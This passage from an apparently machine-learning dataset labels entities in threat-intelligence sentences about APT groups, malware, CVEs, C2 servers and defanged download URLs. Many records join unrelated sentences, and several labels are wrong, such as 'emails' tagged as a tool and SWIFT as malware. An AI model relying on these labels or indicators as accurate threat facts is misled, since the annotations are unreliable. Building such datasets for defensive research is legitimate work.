“ Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse , ” the report states .", "spans": {"TOOL: NetTraveler": [[179, 190]], "VULNERABILITY: CVE-2012-0158": [[212, 225]], "TOOL: NetTraveler Trojan": [[241, 259]], "THREAT_ACTOR: APT16": [[262, 267]], "TOOL: emails": [[295, 301]], "TOOL: Microsoft": [[380, 389]]}, "info": {"id": "cyberner_stix_train_003552", "source": "cyberner_stix_train"}} {"text": "After receiving an unprecedented amount of attention in 2016 , APT28 has continued to mount operations during 2017 and 2018 .", "spans": {"THREAT_ACTOR: APT28": [[63, 68]]}, "info": {"id": "cyberner_stix_train_003553", "source": "cyberner_stix_train"}} {"text": "A search for this certificate fingerprint on the Internet scanning service Censys returns 8 additional servers : IP address 34.208.71.9 34.212.92.0 34.216.43.114 52.34.144.229 54.69.156.31 54.71.249.137 54.189.5.198 78.5.0.195 207.180.245.74 Opening the Command & Control web page in a browser presents a Basic Authentication prompt : Closing this prompt causes the server to send a \" 401 Unauthorized Response '' with an \" Access Denied '' message in Italian Taidoor spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues . Runs the executable file and deletes the .txt file . “ Who or what is asdfdfsda@asdf.com ? , ” Biderman asked , after being sent a list of nine email addresses .", "spans": {"ORGANIZATION: government": [[486, 496]], "FILEPATH: .txt": [[665, 669]], "ORGANIZATION: asdfdfsda@asdf.com": [[694, 712]], "ORGANIZATION: Biderman": [[719, 727]]}, "info": {"id": "cyberner_stix_train_003554", "source": "cyberner_stix_train"}} {"text": "The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . 
Southeastern Europe as well as countries in the former Soviet Union Republichas recently been the main target .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: Flash exploits": [[53, 67]], "TOOL: Carberp": [[85, 92]], "TOOL: JHUHUGIT downloaders": [[99, 119]]}, "info": {"id": "cyberner_stix_train_003555", "source": "cyberner_stix_train"}} {"text": "These spear-phishing emails range from ones purposely designed to look like spam messages used to spread common crimeware and addressed to large numbers of people , to highly targeted emails addressed to only a few recipients ( or even just one person ) and with content that is highly relevant for the intended recipient .", "spans": {"TOOL: emails": [[21, 27], [184, 190]]}, "info": {"id": "cyberner_stix_train_003556", "source": "cyberner_stix_train"}} {"text": "Interestingly , the artifact bundles a copy of OpenSSL 1.0.1e , from February 2013 , which causes the unusually large size of the binary .", "spans": {"TOOL: OpenSSL": [[47, 54]]}, "info": {"id": "cyberner_stix_train_003557", "source": "cyberner_stix_train"}} {"text": "APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East . 
Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week – but it wouldn't confirm the other details in Resecurity 's post , including the attribution .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "ORGANIZATION: military": [[24, 32]], "ORGANIZATION: diplomatic": [[35, 45]], "ORGANIZATION: government": [[50, 60]], "ORGANIZATION: media": [[63, 68]], "ORGANIZATION: energy": [[71, 77]], "ORGANIZATION: engineering": [[80, 91]], "ORGANIZATION: business services": [[94, 111]], "ORGANIZATION: telecommunications sectors": [[116, 142]], "ORGANIZATION: Citrix": [[173, 179]], "ORGANIZATION: Resecurity": [[327, 337]]}, "info": {"id": "cyberner_stix_train_003558", "source": "cyberner_stix_train"}} {"text": "'' We determined that the \" eCommon '' file contains support code and structures that are platform independent . We observed another campaign targeting an organisation located in Lebanon . The Elfin group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": {"THREAT_ACTOR: Elfin group": [[193, 204]], "THREAT_ACTOR: APT33": [[211, 216]]}, "info": {"id": "cyberner_stix_train_003559", "source": "cyberner_stix_train"}} {"text": "Powerview.ps1 — This PowerShell-based module for network reconnaissance is part of the PowerSploit penetration testing framework .", "spans": {"FILEPATH: Powerview.ps1": [[0, 13]], "TOOL: PowerShell-based": [[21, 37]], "TOOL: PowerSploit": [[87, 98]]}, "info": {"id": "cyberner_stix_train_003560", "source": "cyberner_stix_train"}} {"text": "We suspect the updated PIN is sent to the C2 , most likely to give the malware the option to perform privileged activities on the infected device related to payments , system configuration options , etc . 
The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” . CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash .", "spans": {"MALWARE: JavaScript": [[209, 219]], "ORGANIZATION: CTU": [[434, 437]], "THREAT_ACTOR: Mia Ash": [[612, 619]]}, "info": {"id": "cyberner_stix_train_003561", "source": "cyberner_stix_train"}} {"text": "Version # 3 : Sept. - Dec. 2019 — Domain : ponethus [ . one organization is located in the US . Following the release of the article , FireEye observed a distinct change in RIPTIDE ’s protocols and strings . PingPull can use HTTPS over port 8080 for C2.[28 ]", "spans": {"ORGANIZATION: FireEye": [[135, 142]], "MALWARE: RIPTIDE": [[173, 180]], "MALWARE: PingPull": [[208, 216]], "SYSTEM: HTTPS": [[225, 230]], "SYSTEM: C2.[28": [[250, 256]]}, "info": {"id": "cyberner_stix_train_003562", "source": "cyberner_stix_train"}} {"text": "Also , we found a debug version of the implant ( 70a937b2504b3ad6c623581424c7e53d ) that contains interesting constants , including the version of the spyware . Its attack activities can be traced back to April 2012 . Axiom is a cyber espionage group suspected to be associated with the Chinese government .", "spans": {"THREAT_ACTOR: Axiom": [[218, 223]]}, "info": {"id": "cyberner_stix_train_003563", "source": "cyberner_stix_train"}} {"text": "Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . 
The codename for Turla APT group in this presentation is MAKERSMARK .", "spans": {"THREAT_ACTOR: APT12": [[31, 36]], "TOOL: HIGHTIDE": [[65, 73]], "TOOL: Microsoft Word": [[82, 96]], "TOOL: .doc": [[99, 103]], "VULNERABILITY: CVE-2012-0158": [[129, 142]], "THREAT_ACTOR: Turla APT group": [[162, 177]]}, "info": {"id": "cyberner_stix_train_003564", "source": "cyberner_stix_train"}} {"text": "Port 6211 : Calendar extraction service . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer . Criticism of and embarrassing content about Hamas . This includes tens of thousands of terminals outside of Ukraine that , among other things , support wind turbines and provide Internet services to private citizens .", "spans": {"SYSTEM: Calendar": [[12, 20]], "MALWARE: malicious files": [[82, 97]], "TOOL: iviewers.dll file": [[129, 146]], "TOOL: DLL load hijacking": [[160, 178]]}, "info": {"id": "cyberner_stix_train_003565", "source": "cyberner_stix_train"}} {"text": "The first versions of the new AZZY implant appeared in August of this year .", "spans": {"MALWARE: AZZY": [[30, 34]]}, "info": {"id": "cyberner_stix_train_003566", "source": "cyberner_stix_train"}} {"text": "The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . 
If the macros in SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe” .", "spans": {"MALWARE: configuration file": [[4, 22]], "FILEPATH: SPK KANUN": [[131, 140]], "FILEPATH: CiscoAny.exe”": [[265, 278]]}, "info": {"id": "cyberner_stix_train_003567", "source": "cyberner_stix_train"}} {"text": "Most recently they were connected to a campaign in March that targeted ” organizations in Turkey , Pakistan , and Tajikistan .", "spans": {}, "info": {"id": "cyberner_stix_train_003568", "source": "cyberner_stix_train"}} {"text": "Mobile Banking com.IngDirectAndroid ING com.instagram.android Instagram com.konylabs.capitalone Capital One® Mobile com.mail.mobile.android.mail mail.com mail com.microsoft.office.outlook Microsoft Outlook com.snapchat.android Snapchat com.tencent.mm WeChat com.twitter.android Twitter com.ubercab Uber com.usaa.mobile.android.usaa USAA Mobile com.usbank.mobilebanking U.S. Bank - Inspired by customers com.viber.voip Viber com.wf.wellsfargomobile SectorJ04 group carried out intensive hacking on various industrial sectors , including South Korea’s media , manufacturing and universities , around February and March 2019 . 
In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts .", "spans": {"SYSTEM: Capital One® Mobile": [[96, 115]], "SYSTEM: mail": [[154, 158]], "SYSTEM: Microsoft Outlook": [[188, 205]], "SYSTEM: Snapchat": [[227, 235]], "SYSTEM: WeChat": [[251, 257]], "SYSTEM: Twitter": [[278, 285]], "ORGANIZATION: Uber": [[298, 302]], "SYSTEM: USAA Mobile": [[332, 343]], "SYSTEM: Viber": [[418, 423]], "THREAT_ACTOR: SectorJ04": [[448, 457]], "ORGANIZATION: media": [[550, 555]], "ORGANIZATION: manufacturing": [[558, 571]], "ORGANIZATION: universities": [[576, 588]], "THREAT_ACTOR: attackers": [[644, 653]], "MALWARE: Worldwide Interbank Financial Telecommunication": [[675, 722]], "MALWARE: SWIFT": [[725, 730]]}, "info": {"id": "cyberner_stix_train_003569", "source": "cyberner_stix_train"}} {"text": "In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware . CTU researchers discovered the threat actors searching for \" [company] login \" , which directed them to the landing page for remote access .", "spans": {"TOOL: KeyBoy": [[144, 150]], "TOOL: string obfuscation routine": [[165, 191]], "ORGANIZATION: CTU": [[269, 272]]}, "info": {"id": "cyberner_stix_train_003570", "source": "cyberner_stix_train"}} {"text": "] net svcws [ . These samples were contained in exploit documents containing distinct lure content , one having a Tibetan nexus , the other an Indian nexus . But we also attempt to figure out why the adversary changed — what broke? — so that we can predict if and when they will change again in the future . 
Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": {"THREAT_ACTOR: ransomware gangs": [[372, 388]]}, "info": {"id": "cyberner_stix_train_003571", "source": "cyberner_stix_train"}} {"text": "These botnets generally target the following regions :", "spans": {}, "info": {"id": "cyberner_stix_train_003572", "source": "cyberner_stix_train"}} {"text": "Gooligan , a family of Android malware that came to light in November after it compromised more than 1 million Google accounts , contained similar abilities to tamper with Google Play ratings . Regardless of their sophistication or refinement , the malware families within the Lazarus Group 's India and Lima classes perform at a reasonable level for their designed purpose : the introduction and persistence of malware from the Lazarus Group on a victim 's infrastructure . Quasar RAT ( Trojan.Quasar ) : Commodity RAT that can be used to steal passwords and execute commands on an infected computer . The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android": [[23, 30]], "ORGANIZATION: Google": [[111, 117]], "SYSTEM: Google Play": [[172, 183]], "THREAT_ACTOR: Lazarus Group": [[277, 290], [429, 442]], "MALWARE: Quasar RAT": [[475, 485]], "MALWARE: Trojan.Quasar": [[488, 501]], "ORGANIZATION: Hack520": [[611, 618]]}, "info": {"id": "cyberner_stix_train_003573", "source": "cyberner_stix_train"}} {"text": "Finally , Mandiant’s Devon Kerr and John Miller of FireEye iSIGHT Intelligence will expose the tactics of FIN7 , a financially motivated hacker group that FireEye tracked throughout 2016 . 
Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": {"ORGANIZATION: Mandiant’s": [[10, 20]], "ORGANIZATION: FireEye": [[51, 58], [155, 162]], "THREAT_ACTOR: FIN7": [[106, 110]], "ORGANIZATION: financially": [[115, 126]], "THREAT_ACTOR: Clever Kitten": [[189, 202]], "ORGANIZATION: individual": [[368, 378]], "ORGANIZATION: social engineering": [[412, 430]]}, "info": {"id": "cyberner_stix_train_003574", "source": "cyberner_stix_train"}} {"text": "Microsoft application whitelisting solution AppLocker prevents unknown executables from running on a system .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "TOOL: application whitelisting solution": [[10, 43]], "TOOL: AppLocker": [[44, 53]]}, "info": {"id": "cyberner_stix_train_003575", "source": "cyberner_stix_train"}} {"text": "any additional APKs are downloaded to external storage . Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers , it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions , or if Lazarus had in fact developed its own malware to attack banks ' systems . It has compromised a wide range of targets , including governments along with organizations in the research , chemical , engineering , manufacturing , consulting , finance , telecoms , and several other sectors . 
NuisanceDestruction intrinsic There are some that are intrinsically motivated to simply attack an organization or person for no other reason than to create chaos and destruction .", "spans": {"ORGANIZATION: media": [[108, 113]], "THREAT_ACTOR: attackers": [[177, 186]], "THREAT_ACTOR: Lazarus": [[216, 223], [294, 301]], "ORGANIZATION: banks": [[350, 355]], "ORGANIZATION: governments": [[423, 434]]}, "info": {"id": "cyberner_stix_train_003576", "source": "cyberner_stix_train"}} {"text": "Carefully consider the risks before granting administrative rights to users on their own machines .", "spans": {}, "info": {"id": "cyberner_stix_train_003577", "source": "cyberner_stix_train"}} {"text": "Lets start by giving a summary about the muddyc3 tool :", "spans": {"TOOL: muddyc3": [[41, 48]]}, "info": {"id": "cyberner_stix_train_003578", "source": "cyberner_stix_train"}} {"text": "] 137 54.69.156 [ . Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos' approaches with respect to the \" TRITON actor \" comes down to fundamental philosophical differences in methodology . The threat actor behind the attack invested considerable time and effort to lure their victims with specially-crafted documents that target Palestinian individuals and entities in the Middle East . 
None Enablement and usage of SQL extended stored procedures for Windows shell command execution : PIEHOP ( filename : r3_iec104_control.exe ) ( MD5 : cd8f394652db3d0376ba24a990403d20 ) is a disruption tool written in Python and packaged with PyInstaller version 2.1 + that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": {"ORGANIZATION: FireEye": [[261, 268]], "ORGANIZATION: Dragos'": [[273, 280]], "TOOL: TRITON": [[314, 320]], "TOOL: PIEHOP": [[694, 700]]}, "info": {"id": "cyberner_stix_train_003579", "source": "cyberner_stix_train"}} {"text": "The following month , we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples . According to the Fxmsp , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks . Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": {"TOOL: installer": [[407, 416]], "ORGANIZATION: Malwarebytes": [[507, 519]]}, "info": {"id": "cyberner_stix_train_003580", "source": "cyberner_stix_train"}} {"text": "] com on port 22011 . In 2015 , Suckfly conducted a multistage attack . Directory of Government Services.pdf : Tracked by Mandiant as FREEFIRE , it is a lightweight backdoor written for .NET .", "spans": {"FILEPATH: Directory of Government Services.pdf": [[72, 108]], "MALWARE: FREEFIRE": [[134, 142]]}, "info": {"id": "cyberner_stix_train_003581", "source": "cyberner_stix_train"}} {"text": "First , the attacker’s mission is to disrupt an operational process rather than steal data . 
The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": {"THREAT_ACTOR: attacker’s": [[12, 22]], "ORGANIZATION: McAfee Advanced Threat Research": [[97, 128]], "FILEPATH: data-gathering implant": [[166, 188]]}, "info": {"id": "cyberner_stix_train_003582", "source": "cyberner_stix_train"}} {"text": "Infrastructure FTP server The attackers used ftp : //213.174.157 [ . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality . APT33 : 91.235.142.76 mywinnetwork.ddns.net . It supports loading arbitrary .NET assemblies encoded as Base64 sent to it via chat comments .", "spans": {"ORGANIZATION: US-CERT Code Analysis Team": [[119, 145]], "MALWARE: botnet controller": [[155, 172]], "THREAT_ACTOR: APT33": [[189, 194]], "IP_ADDRESS: 91.235.142.76": [[197, 210]], "DOMAIN: mywinnetwork.ddns.net": [[211, 232]]}, "info": {"id": "cyberner_stix_train_003583", "source": "cyberner_stix_train"}} {"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . 
Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": {"ORGANIZATION: Indian Army": [[124, 135]], "ORGANIZATION: Political entities": [[207, 225]], "THREAT_ACTOR: IndigoZebra": [[309, 320]], "THREAT_ACTOR: Sofacy": [[323, 329]], "MALWARE: Zebrocy": [[337, 344]], "MALWARE: malware": [[345, 352], [401, 408]], "MALWARE: Octopus": [[393, 400]]}, "info": {"id": "cyberner_stix_train_003584", "source": "cyberner_stix_train"}} {"text": "Answer from the C2 The C2 will check the country field , if it 's empty or if the country is not targeted , it will reply with a \" Unauthorized '' answer . Most targets are from the Middle East : Israel , Egypt , Saudi Arabia , United Arab Emirates and Iraq . DUDELL : File Name :E quipment Purchase List 2018-2020 (Final ).xls . p - macos-55554944c2a6eb29a7bc3c73acdaa3e0a7a8d8c7", "spans": {"MALWARE: DUDELL": [[260, 266]], "FILEPATH: :E quipment Purchase List 2018-2020 (Final ).xls": [[279, 327]], "MALWARE: p - macos-55554944c2a6eb29a7bc3c73acdaa3e0a7a8d8c7": [[330, 380]]}, "info": {"id": "cyberner_stix_train_003585", "source": "cyberner_stix_train"}} {"text": "The server can use this information to determine if the user ’ s carrier is one of Bread ’ s targets . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post . The last type of Kernel modification that ZxShell rootkit performs is the system call dispatcher ( KiFastCallEntry ) hook . 
Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"MALWARE: Bread": [[83, 88]], "THREAT_ACTOR: Bahamut": [[176, 183]], "MALWARE: Devoted To Humanity": [[199, 218]], "MALWARE: ZxShell": [[360, 367]], "ORGANIZATION: Talos researchers": [[442, 459]], "TOOL: Open Babel": [[508, 518]]}, "info": {"id": "cyberner_stix_train_003586", "source": "cyberner_stix_train"}} {"text": "Like HammerDuke , SeaDuke appears to be used by the Dukes group primarily as a secondary backdoor left on CozyDuke victims after that toolset has completed the initial infection and stolen any readily available information from them .", "spans": {"MALWARE: HammerDuke": [[5, 15]], "MALWARE: SeaDuke": [[18, 25]], "THREAT_ACTOR: Dukes": [[52, 57]], "MALWARE: CozyDuke": [[106, 114]]}, "info": {"id": "cyberner_stix_train_003587", "source": "cyberner_stix_train"}} {"text": "To be more specific , the malware uninstalls cloud security products by Alibaba Cloud and Tencent Cloud . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b .", "spans": {"TOOL: Flash": [[117, 122]], "VULNERABILITY: exploits": [[123, 131]], "TOOL: Java": [[201, 205]], "VULNERABILITY: zero-day": [[206, 214]], "ORGANIZATION: Kaspersky Lab": [[274, 287]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[300, 328]]}, "info": {"id": "cyberner_stix_train_003588", "source": "cyberner_stix_train"}} {"text": "Nevertheless , users should practice proper security hygiene to mitigate threats that may take advantage of a home or business router ’ s security gaps . It was previously believed that the attackers used scripts to manipulate legitimate software on the server into enabling the fraudulent activity . 
Dropurl : kentona[.su – 47.245.58.124 https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe C2: 217[.12.201.159 TA505 : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325 TA505 : 1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b TA505 : fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0 TA505 : c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a TA505 : 5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3 .", "spans": {"THREAT_ACTOR: attackers": [[190, 199]], "TOOL: scripts": [[205, 212]], "DOMAIN: kentona[.su": [[311, 322]], "IP_ADDRESS: 47.245.58.124": [[325, 338]], "URL: https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe": [[339, 402]], "URL: https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe": [[403, 466]], "DOMAIN: 217[.12.201.159": [[471, 486]], "THREAT_ACTOR: TA505": [[487, 492], [562, 567], [635, 640], [708, 713], [781, 786]], "FILEPATH: 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325": [[495, 561]], "FILEPATH: 1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b": [[570, 634]], "FILEPATH: fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0": [[643, 707]], "FILEPATH: c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a": [[716, 780]], "FILEPATH: 5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3": [[789, 853]]}, "info": {"id": "cyberner_stix_train_003589", "source": "cyberner_stix_train"}} {"text": "Italian ( Subito.apk ) and French ( Leboncoin.apk ) versions appeared shortly afterwards in January 2019 . \bFireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 . 
Both files were stored in \"C:\\Windows\" .", "spans": {"ORGANIZATION: \bFireEye iSIGHT": [[107, 122]], "THREAT_ACTOR: APT37": [[150, 155]], "THREAT_ACTOR: Scarcruft": [[206, 215]], "THREAT_ACTOR: Group123": [[220, 228]], "FILEPATH: \"C:\\Windows\"": [[257, 269]]}, "info": {"id": "cyberner_stix_train_003590", "source": "cyberner_stix_train"}} {"text": "Conversations-based app mimics Telegram messenger Even when we originally thought this was a backdoored version of the Conversations app , used to infect victims , we didn´t discovered anything malicious in it . When the group's focus shifted to banks , the decoy documents were related to banking system regulations or advisories from FinCERT , an organization created by the Russian government to provide help and guidance to its financial institutions . But both group seem to have different TTPs ( Tactics , Techniques and Procedures ) and it leads us to believe that one group regularly lurks in the other ’s shadow .", "spans": {"SYSTEM: Telegram messenger": [[31, 49]], "THREAT_ACTOR: group's": [[221, 228]], "ORGANIZATION: FinCERT": [[336, 343]]}, "info": {"id": "cyberner_stix_train_003591", "source": "cyberner_stix_train"}} {"text": "Record audio using the computer ’s microphone .", "spans": {}, "info": {"id": "cyberner_stix_train_003592", "source": "cyberner_stix_train"}} {"text": "The service is implemented in the class com.serenegiant.service.ScreenRecorderService which is declared in the package manifest . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed . Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan . 
Adversaries may also make changes to victim systems to abuse non - standard ports .", "spans": {"TOOL: Lamberts": [[173, 181]], "TOOL: Regin": [[217, 222]], "TOOL: ProjectSauron": [[225, 238]], "TOOL: Equation": [[241, 249]], "TOOL: Duqu2": [[254, 259]], "ORGANIZATION: PRC": [[424, 427]], "THREAT_ACTOR: Adversaries": [[464, 475]]}, "info": {"id": "cyberner_stix_train_003593", "source": "cyberner_stix_train"}} {"text": "In aggregate , the type of information stolen could let an attacker know where a person is , with whom they are associated ( including contacts ’ profile photos ) , the messages they are sending , the websites they visit and search history , screenshots that reveal data from other apps on the device , the conversations they have in the presence of the device , and a myriad of images including anything at which device ’ s camera is pointed . The Turla group is known to be painstaking and work in stages , first doing reconnaissance on their victims' systems before deploying their most sophisticated tools such as Carbon . Each Svchost session can contain multiple shared services that are organized in groups . Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality , or without the logical preconditions to trigger their expected function .", "spans": {"TOOL: Carbon": [[618, 624]], "TOOL: Svchost": [[632, 639]]}, "info": {"id": "cyberner_stix_train_003594", "source": "cyberner_stix_train"}} {"text": "This behavior can be detected using a tool called WinLister , which enumerates hidden windows .", "spans": {"TOOL: WinLister": [[50, 59]], "SYSTEM: windows": [[86, 93]]}, "info": {"id": "cyberner_stix_train_003595", "source": "cyberner_stix_train"}} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . 
In this blog post , we discussed two separate malware variations that behave in very similar ACTs and use similar techniques to acquire a C2 address , with both using Yahoo Answers and Quora to evade traditional mechanisms for blocking command and control domains .", "spans": {"MALWARE: Mimikatz": [[0, 8]], "TOOL: C2": [[243, 245]]}, "info": {"id": "cyberner_stix_train_003596", "source": "cyberner_stix_train"}} {"text": "The malware is also issuing commands to download and execute other malware families such as the banking Trojans Dridex and Qakbot . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) .", "spans": {"TOOL: banking Trojans Dridex": [[96, 118]], "TOOL: Qakbot": [[123, 129]], "THREAT_ACTOR: Pitty Tiger group": [[172, 189]], "FILEPATH: Microsoft Office Word document": [[218, 248]], "VULNERABILITY: CVE-2012-0158": [[291, 304]]}, "info": {"id": "cyberner_stix_train_003597", "source": "cyberner_stix_train"}} {"text": "In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates .", "spans": {"ORGANIZATION: Symantec": [[16, 24]], "THREAT_ACTOR: Suckfly": [[45, 52]]}, "info": {"id": "cyberner_stix_train_003598", "source": "cyberner_stix_train"}} {"text": "With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November’s Single’s Day and December’s Asian online shopping fest . 
In this sample , however , the module names were changed from actors and characters’ names to car models , namely BMW_x1” , BMW_x2” and up to BMW_x8” .", "spans": {"THREAT_ACTOR: Shun Wang": [[40, 49]], "FILEPATH: BMW_x1”": [[444, 451]], "FILEPATH: BMW_x2”": [[454, 461]], "FILEPATH: BMW_x8”": [[472, 479]]}, "info": {"id": "cyberner_stix_train_003599", "source": "cyberner_stix_train"}} {"text": "Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported .", "spans": {"ORGANIZATION: Anomali": [[0, 7]], "MALWARE: ITW": [[86, 89]], "VULNERABILITY: CVE-2018-0798": [[117, 130]], "VULNERABILITY: zero-day": [[136, 144]], "VULNERABILITY: CVE-2011-3544": [[257, 270]], "VULNERABILITY: CVE-2010-0738": [[318, 331]], "ORGANIZATION: Dell SecureWorks'": [[364, 381]]}, "info": {"id": "cyberner_stix_train_003600", "source": "cyberner_stix_train"}} {"text": "Interestingly , there is an allowlist of tapped activities : ui.ConversationActivity ui.ConversationListActivity SemcInCallScreen Quadrapop SocialPhonebookActivity The listener can operate with only coordinates , so it calculates pressed characters by matching given values with hardcoded ones : Additionally , if there is a predefined command , the keylogger can make a screenshot of the tapped display area : Manual access and operator menu There is a hidden menu ( Activity ) for controlling implant features that It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections ; however , HIDDEN COBRA actors use a suite of custom tools , some of which could also be used to initially compromise a system . 
APT33 : dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40 S-SHA2 POSHC2 backdoor . In late May , SentinelLabs observed a new Iranian statesponsored APT , which they dubbed Agrius , as conducting an extensive espionagedestruction campaign against Israeli targets since 2020 .", "spans": {"TOOL: Volgmer": [[591, 598]], "THREAT_ACTOR: HIDDEN COBRA actors": [[622, 641]], "TOOL: custom tools": [[657, 669]], "THREAT_ACTOR: APT33": [[740, 745]], "MALWARE: dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40 S-SHA2 POSHC2 backdoor": [[748, 835]], "ORGANIZATION: SentinelLabs": [[852, 864]], "THREAT_ACTOR: APT": [[903, 906]], "THREAT_ACTOR: Agrius": [[927, 933]], "ORGANIZATION: Israeli targets": [[1001, 1016]]}, "info": {"id": "cyberner_stix_train_003601", "source": "cyberner_stix_train"}} {"text": "Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"THREAT_ACTOR: Scattered Canary": [[95, 111]], "MALWARE: NetTraveler": [[251, 262]], "VULNERABILITY: exploit": [[276, 283]], "VULNERABILITY: CVE-2012-0158": [[284, 297]], "MALWARE: NetTraveler Trojan": [[313, 331]]}, "info": {"id": "cyberner_stix_train_003602", "source": "cyberner_stix_train"}} {"text": "We have provided an updated version of those conclusions , a layout of the tactics that they generally employ , as well as observations of apparent tactical shifts .", "spans": {}, "info": {"id": "cyberner_stix_train_003603", "source": "cyberner_stix_train"}} {"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
